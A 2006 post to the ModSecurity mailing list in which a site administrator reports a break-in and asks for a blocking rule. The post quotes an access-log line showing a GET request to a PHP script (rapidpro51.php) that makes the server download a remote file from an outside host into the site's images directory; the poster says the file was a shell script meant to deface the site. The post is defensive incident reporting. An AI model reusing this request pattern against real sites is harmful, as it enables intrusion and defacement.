[Modsecurity] New downloadable exploit
Michael S.
admin at thenamegame.com
Thu Apr 20 00:00:52 EDT 2006
One of our user sites was hacked on April 4th. It seems they used this
command to do it.
195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET
/rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&
comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpubli
c_html%2Fimages%2Fdvd HTTP/1.1" 200 12933
"http://www.site.com.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1)" "hotlog=1"
Notice the 200 status? Is there a rule to stop this?
This is a shell script that was downloaded to the user's website then
execute to deface the site. They were unable to do anything.
Thank you.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.gotroot.com/pipermail/modsecurity/attachments/20060420/8e8ae2cf/attachment.html
More information about the Modsecurity
mailing list